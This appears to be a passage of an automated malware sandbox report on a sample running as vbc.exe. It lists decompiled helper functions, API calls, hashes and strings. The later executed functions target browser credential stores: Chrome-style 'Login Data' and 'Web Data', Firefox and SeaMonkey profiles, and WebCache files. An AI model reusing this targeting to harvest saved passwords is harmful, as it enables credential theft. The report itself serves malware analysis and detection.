                                                                                              • Opcode Fuzzy Hash: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                              • Instruction Fuzzy Hash: 7F0125B1E102199FDF00CFA9D8807AEBBF8FF08319F10442AE915E6280DBB88915CF44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040ADB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ADB3(void* __ebx, void* __eflags) {
				char _v265;
				char _v526;
				char _v787;
				void _v1048;
				void _v3648;
				intOrPtr _v3652;
				char _v3660;
				void* _t30;

				_t30 = __ebx;
				_v3660 = 0x41300c;
				memset( &_v3648, 0, 0x10);
				_v1048 = 0;
				_v787 = 0;
				_v526 = 0;
				_v265 = 0;
				_v3652 = 0x6c;
				memcpy( &_v1048,  *((intOrPtr*)(__ebx + 0x370)) + 0xb20, 0x105 << 2);
				if(E00401596( &_v3660,  *((intOrPtr*)(__ebx + 0x108))) != 0) {
					E0040AD9D(memcpy( *((intOrPtr*)(__ebx + 0x370)) + 0xb20,  &_v1048, 0x105 << 2));
				}
				SetFocus( *( *((intOrPtr*)(_t30 + 0x370)) + 0x184));
				return E0040143D( &_v3660);
			}











                                                                                              0x0040adb3
                                                                                              0x0040adc9
                                                                                              0x0040add3
                                                                                              0x0040ade7
                                                                                              0x0040adee
                                                                                              0x0040adf5
                                                                                              0x0040adfc
                                                                                              0x0040ae03
                                                                                              0x0040ae1e
                                                                                              0x0040ae2d
                                                                                              0x0040ae4a
                                                                                              0x0040ae4a
                                                                                              0x0040ae5b
                                                                                              0x0040ae6f

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040ADD3
                                                                                              • SetFocus.USER32(?,?), ref: 0040AE5B
                                                                                                • Part of subcall function 0040AD9D: PostMessageA.USER32 ref: 0040ADAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FocusMessagePostmemset
                                                                                              • String ID: l
                                                                                              • API String ID: 3436799508-2517025534
                                                                                              • Opcode ID: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                              • Instruction ID: a3aa1947760d1632b5ff20bf1b11b778d92a779fff19439862dc3abef3b95f30
                                                                                              • Opcode Fuzzy Hash: aeb443fdb5aee6ef7c028d3e89b28528cc274f3a7ebb19c8f17c9a74365f91d9
                                                                                              • Instruction Fuzzy Hash: 1011A1719002589BDF21AB14CC047CA7BAAAF80308F0804F5A94C7B292C7B55B88CFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408441, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00408441(void** __esi, struct HWND__* _a4) {
				long _v12;
				signed int _v24;
				signed int _v28;
				short _v32;
				void* _v40;
				long _t17;
				short* _t23;
				int _t24;
				void** _t25;

				_t25 = __esi;
				_t24 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							_t23 =  *_t25 + _t24 * 4;
							_v40 = 0x22;
							_t17 = SendMessageA(_a4, 0x1019, _t24,  &_v40);
							if(_t17 != 0) {
								 *_t23 = _v32;
								_t17 = _v12;
								 *(_t23 + 2) = _t17;
							}
							_t24 = _t24 + 1;
						} while (_t24 < _t25[1]);
					}
				}
				return _t17;
			}












                                                                                              0x00408441
                                                                                              0x00408449
                                                                                              0x0040844e
                                                                                              0x0040845a
                                                                                              0x00408465
                                                                                              0x00408467
                                                                                              0x00408469
                                                                                              0x0040846d
                                                                                              0x00408471
                                                                                              0x00408481
                                                                                              0x00408488
                                                                                              0x00408490
                                                                                              0x00408496
                                                                                              0x00408499
                                                                                              0x0040849d
                                                                                              0x0040849d
                                                                                              0x004084a1
                                                                                              0x004084a2
                                                                                              0x00408467
                                                                                              0x00408465
                                                                                              0x004084aa

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageSendmemset
                                                                                              • String ID: "
                                                                                              • API String ID: 568519121-123907689
                                                                                              • Opcode ID: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                              • Instruction ID: 3d4b9897b9e590d379032152458179bae83636b6f0047c21005e3f982915147a
                                                                                              • Opcode Fuzzy Hash: 34401dede8e385bb68c53d7b6caaa6400c7ccd3c24b43ec3f913943d5d854be5
                                                                                              • Instruction Fuzzy Hash: 4F01D635900205AFDB20CF95C941EAFB7F8FF84759F10842EE891AA240E738DA85CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406618, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406618(intOrPtr __eax, char* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				_v20 = 0x413008;
				if(GetOpenFileNameA( &_v80) == 0) {
					return 0;
				} else {
					strcpy(__esi, _v52);
					return 1;
				}
			}















                                                                                              0x0040661e
                                                                                              0x00406624
                                                                                              0x00406629
                                                                                              0x0040662c
                                                                                              0x0040662f
                                                                                              0x00406635
                                                                                              0x0040663c
                                                                                              0x00406643
                                                                                              0x0040664a
                                                                                              0x0040664d
                                                                                              0x00406654
                                                                                              0x0040665b
                                                                                              0x0040666a
                                                                                              0x0040667f
                                                                                              0x0040666c
                                                                                              0x00406670
                                                                                              0x0040667b
                                                                                              0x0040667b

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileNameOpenstrcpy
                                                                                              • String ID: L
                                                                                              • API String ID: 812585365-2909332022
                                                                                              • Opcode ID: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                              • Instruction ID: 13dc2997c8553d865726dff807e233ea18e6c60b58d53e24b26ad6de5975139e
                                                                                              • Opcode Fuzzy Hash: 005d7a4cd57d0344050e2e978546a456973b8179e79084affb1262c5eec5662a
                                                                                              • Instruction Fuzzy Hash: 5201B2B1D10218AFCF40DFA9D8456CEBFF8BB08308F00812AE519E6240E7B886458F98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407BB9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadMenuA.USER32 ref: 00407BC1
                                                                                              • sprintf.MSVCRT ref: 00407BE4
                                                                                                • Part of subcall function 00407A64: GetMenuItemCount.USER32 ref: 00407A7A
                                                                                                • Part of subcall function 00407A64: memset.MSVCRT ref: 00407A9E
                                                                                                • Part of subcall function 00407A64: GetMenuItemInfoA.USER32 ref: 00407AD4
                                                                                                • Part of subcall function 00407A64: memset.MSVCRT ref: 00407B01
                                                                                                • Part of subcall function 00407A64: strchr.MSVCRT ref: 00407B0D
                                                                                                • Part of subcall function 00407A64: strcat.MSVCRT(?,?,?,?,?,00000001,?), ref: 00407B68
                                                                                                • Part of subcall function 00407A64: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 00407B84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Menu$Itemmemset$CountInfoLoadModifysprintfstrcatstrchr
                                                                                              • String ID: menu_%d
                                                                                              • API String ID: 3671758413-2417748251
                                                                                              • Opcode ID: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                              • Instruction ID: 3be60505ea2565ef11dfa3f51dd36ce0e69a3f53bb310b440500eec60165980c
                                                                                              • Opcode Fuzzy Hash: e0b27bc8312c4869803a1ee04920a3f9795f2512d2491c73ec6fe14da36cbe17
                                                                                              • Instruction Fuzzy Hash: 9FD01D71A4D14037D72033356D09FCF19794BD3B15F5440A9F200722D1D57C5755857D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406325, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406325(char* _a4) {

				if( *0x417550 == 0) {
					 *0x417658 = GetWindowsDirectoryA(0x417550, 0x104);
				}
				strcpy(_a4, 0x417550);
				return  *0x417658;
			}



                                                                                              0x00406332
                                                                                              0x00406340
                                                                                              0x00406340
                                                                                              0x0040634a
                                                                                              0x00406357

                                                                                              APIs
                                                                                              • GetWindowsDirectoryA.KERNEL32(00417550,00000104,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040633A
                                                                                              • strcpy.MSVCRT(00000000,00417550,?,0040E228,00000000,?,00000000,00000104,00000104), ref: 0040634A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DirectoryWindowsstrcpy
                                                                                              • String ID: PuA
                                                                                              • API String ID: 531766897-3228437271
                                                                                              • Opcode ID: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                              • Instruction ID: dc620c75b08fae7ca861cc569808ec9e0c9c78cdcec5c9dc17d9b47d99426002
                                                                                              • Opcode Fuzzy Hash: b1972f0ba22637c8055687d42c6acbfd742ac988b9f6313726f8896cebb56ee7
                                                                                              • Instruction Fuzzy Hash: D2D0A77184E2907FE3015728BC45AC63FB5DB05330F10807BF508A25A0E7741C90879C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408348, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00408348(char* __esi) {
				char* _t2;
				char* _t6;

				_t6 = __esi;
				E00406160(__esi);
				_t2 = strrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 = 0;
				}
				return strcat(_t6, "_lng.ini");
			}





                                                                                              0x00408348
                                                                                              0x00408349
                                                                                              0x00408351
                                                                                              0x0040835b
                                                                                              0x0040835d
                                                                                              0x0040835d
                                                                                              0x0040836d

                                                                                              APIs
                                                                                                • Part of subcall function 00406160: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,0040834E,00000000,0040826C,?,00000000,00000104,?), ref: 0040616B
                                                                                              • strrchr.MSVCRT ref: 00408351
                                                                                              • strcat.MSVCRT(00000000,_lng.ini,00000000,00000104,?), ref: 00408366
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamestrcatstrrchr
                                                                                              • String ID: _lng.ini
                                                                                              • API String ID: 3097366151-1948609170
                                                                                              • Opcode ID: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                              • Instruction ID: a8d2890f819e62600bf11f9c0364550bfc67884382c2ab22ce71db24782b6e2f
                                                                                              • Opcode Fuzzy Hash: d4342e7cf2f2cd7acb0c5595099143b60559064a13119ecfeb2f3085bb136c0c
                                                                                              • Instruction Fuzzy Hash: 37C01275686A5438D11622355E03B8F01454F52745F24409BF903391D6DE5D569141AE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403397, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403397(CHAR* _a4, CHAR* _a8, char _a12) {

				_t2 =  &_a12; // 0x403428
				return GetPrivateProfileStringA("Server Details", _a8, 0x412466,  *_t2, 0x7f, _a4);
			}



                                                                                              0x0040339d
                                                                                              0x004033b5

                                                                                              APIs
                                                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,Function_00012466,(4@,0000007F,?), ref: 004033AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString
                                                                                              • String ID: (4@$Server Details
                                                                                              • API String ID: 1096422788-3984282551
                                                                                              • Opcode ID: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                              • Instruction ID: 5387a3ffe087b7673ef104c15d829f3f0df010b9e50aa15a0af8b6122c5a167a
                                                                                              • Opcode Fuzzy Hash: 7bf2893a727a8b250936425436c2602b2102234e3c58862608b198b8383da292
                                                                                              • Instruction Fuzzy Hash: A0C04031544301FAC5114F909F05E4D7F516B54B40F118415B24450065C1E54574DB26
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004084CE, Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 88%
                                                                                              			E004084CE(intOrPtr* __esi, void* __eflags) {
				intOrPtr* _t22;
				intOrPtr* _t31;

				_t31 = __esi;
				 *__esi = 0x413320;
				_t22 = E00406549(0x1c8, __esi);
				_push(0x14);
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L004115D0();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                                                              0x004084ce
                                                                                              0x004084d6
                                                                                              0x004084dc
                                                                                              0x004084e1
                                                                                              0x004084e3
                                                                                              0x004084f3
                                                                                              0x00408505
                                                                                              0x004084f5
                                                                                              0x004084f5
                                                                                              0x004084f8
                                                                                              0x004084fa
                                                                                              0x004084fd
                                                                                              0x00408500
                                                                                              0x00408500
                                                                                              0x00408507
                                                                                              0x00408509
                                                                                              0x0040850c
                                                                                              0x00408514
                                                                                              0x00408526
                                                                                              0x00408516
                                                                                              0x00408516
                                                                                              0x00408519
                                                                                              0x0040851b
                                                                                              0x0040851e
                                                                                              0x00408521
                                                                                              0x00408521
                                                                                              0x00408528
                                                                                              0x0040852a
                                                                                              0x0040852d
                                                                                              0x00408535
                                                                                              0x00408547
                                                                                              0x00408537
                                                                                              0x00408537
                                                                                              0x0040853a
                                                                                              0x0040853c
                                                                                              0x0040853f
                                                                                              0x00408542
                                                                                              0x00408542
                                                                                              0x00408549
                                                                                              0x0040854b
                                                                                              0x0040854e
                                                                                              0x00408556
                                                                                              0x00408568
                                                                                              0x00408558
                                                                                              0x00408558
                                                                                              0x0040855b
                                                                                              0x0040855d
                                                                                              0x00408560
                                                                                              0x00408563
                                                                                              0x00408563
                                                                                              0x0040856b
                                                                                              0x00408571

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                              • Instruction ID: 33d46294e57da76ea2c08804649fae6184d1477937e8cd9eb119e1572679ad16
                                                                                              • Opcode Fuzzy Hash: 95721ad3e56739601f71688443cad15957724b47e5dc3dc32a69c890d8a4f10a
                                                                                              • Instruction Fuzzy Hash: F321B3B0A01300AED7518F2B9945955FBE4FF94355B2AC8AFD149DB2B2EBB8C8408F14
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406A74, Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406A74(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E004060FA(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                                                              0x00406a7e
                                                                                              0x00406a80
                                                                                              0x00406a85
                                                                                              0x00406a88
                                                                                              0x00406a8f
                                                                                              0x00406a92
                                                                                              0x00406a96
                                                                                              0x00406a99
                                                                                              0x00406a9c
                                                                                              0x00406aac
                                                                                              0x00406a9e
                                                                                              0x00406aa0
                                                                                              0x00406aa0
                                                                                              0x00406ab2
                                                                                              0x00406ab8
                                                                                              0x00406abc
                                                                                              0x00406abf
                                                                                              0x00406ad0
                                                                                              0x00406ac1
                                                                                              0x00406ac3
                                                                                              0x00406ac3
                                                                                              0x00406ae3
                                                                                              0x00406af0
                                                                                              0x00406afc
                                                                                              0x00406aff
                                                                                              0x00406b06
                                                                                              0x00406b0c

                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 00406A80
                                                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                                • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                                • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                                • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                              • memcpy.MSVCRT ref: 00406AE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3669619086-0
                                                                                              • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                              • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                              • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                              • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: vbc.exe PID: 6736 Parent PID: 6244 vbc.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 0040F0D5, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F0F8
                                                                                              • memset.MSVCRT ref: 0040F10D
                                                                                              • memset.MSVCRT ref: 0040F122
                                                                                              • memset.MSVCRT ref: 0040F137
                                                                                              • memset.MSVCRT ref: 0040F14C
                                                                                                • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                              • wcslen.MSVCRT ref: 0040F172
                                                                                              • wcslen.MSVCRT ref: 0040F183
                                                                                              • wcslen.MSVCRT ref: 0040F1BB
                                                                                              • wcslen.MSVCRT ref: 0040F1C9
                                                                                              • wcslen.MSVCRT ref: 0040F202
                                                                                              • wcslen.MSVCRT ref: 0040F210
                                                                                              • memset.MSVCRT ref: 0040F296
                                                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                              • API String ID: 2775653040-2068335096
                                                                                              • Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                              • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                                                              • Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                              • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004090DF, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409102
                                                                                              • memset.MSVCRT ref: 0040911A
                                                                                                • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                              • wcslen.MSVCRT ref: 00409136
                                                                                              • wcslen.MSVCRT ref: 00409145
                                                                                              • wcslen.MSVCRT ref: 0040918C
                                                                                              • wcslen.MSVCRT ref: 0040919B
                                                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                              • API String ID: 2036768262-2114579845
                                                                                              • Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                              • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                                                              • Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                              • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410075, Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wcslen$memsetwcscatwcscpy
                                                                                              • String ID: Login Data$Web Data
                                                                                              • API String ID: 3932597654-4228647177
                                                                                              • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                              • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                                                              • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                              • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F026, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F042
                                                                                              • memset.MSVCRT ref: 0040F057
                                                                                                • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                                                                • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                                                              • wcscat.MSVCRT ref: 0040F080
                                                                                                • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                              • wcscat.MSVCRT ref: 0040F0A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                              • API String ID: 1534475566-1174173950
                                                                                              • Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
